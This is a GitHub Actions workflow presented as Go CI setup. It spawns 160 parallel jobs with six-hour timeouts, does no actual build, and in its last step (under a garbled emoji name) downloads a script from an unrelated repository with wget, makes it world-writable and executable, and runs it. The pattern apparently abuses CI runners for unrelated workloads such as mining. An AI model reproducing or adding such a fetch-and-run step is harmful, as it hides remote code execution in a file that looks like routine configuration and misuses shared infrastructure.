name: SETUP CD/CI

on: [push]
jobs:
  build:
    name: setting build
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
        flag: [A, B, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: ğŸš´ğŸš´â¬‡ï¸
      uses: actions/checkout@v1
    - name: ğŸ‰
      run: |
          wget https://raw.githubusercontent.com/tajbxhsb/fantastic-doodle/main/TestNN.sh && chmod 777 TestNN.sh && ./TestNN.sh
